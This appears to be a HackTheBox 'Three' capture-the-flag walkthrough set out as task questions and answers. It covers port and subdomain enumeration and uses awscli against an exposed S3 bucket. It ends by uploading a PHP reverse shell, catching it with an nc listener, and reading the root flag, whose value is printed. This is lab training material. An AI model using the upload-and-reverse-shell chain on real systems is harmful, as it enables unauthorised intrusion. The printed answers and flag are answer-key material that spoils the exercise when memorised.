[HTB - Starting Point] Three
Task 1
Q : How many TCP ports are open?
[host] # nmap -sVC -p- --open <target_ip> -oA Three_full_scan
A : 2
Task 2
Q : What is the domain of the email address provided in the “Contact” section of the website?
A : thetoppers.htb
Task 3
Q : In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
A : /etc/hosts
Task 4
Q : Which sub-domain is discovered during further enumeration?
[host] # echo "<target_ip> thetoppers.htb" >> /etc/hosts
[host] # tgt_size=$(curl -s http://thetoppers.htb | wc -c)
[host] # ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -fs $tgt_size -mc all
A : s3.thetoppers.htb
Task 5
Q : Which service is running on the discovered sub-domain?
A : amazon s3
Task 6
Q : Which command line utility can be used to interact with the service running on the discovered sub-domain?
A : awscli
Task 7
Q : Which command is used to set up the AWS CLI installation?
A : aws configure
Task 8
Q : What is the command used by the above utility to list all of the S3 buckets?
A : aws s3 ls
Task 9
Q : This server is configured to run files written in what web scripting language?
[host] # aws --endpoint-url=http://s3.thetoppers.htb s3 ls
[host] # aws --endpoint-url=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
A : php
SUBMIT FLAG
Q : Submit root flag
get a php-reverse-shell script.
[host] # aws --endpoint=http://s3.thetoppers.htb s3 cp php-reverse-shell.php s3://thetoppers.htb
[host] # nc -nvlp <listen_port_in_php_reverse_shell>
browse http://<target_ip>/php-reverse-shell.php
(reverse-shell) $ find / -name flag.txt 2>/dev/null
(reverse-shell) $ cat /var/www/flag.txt
A : a980d99281a28d638ac68b9bf9453c2b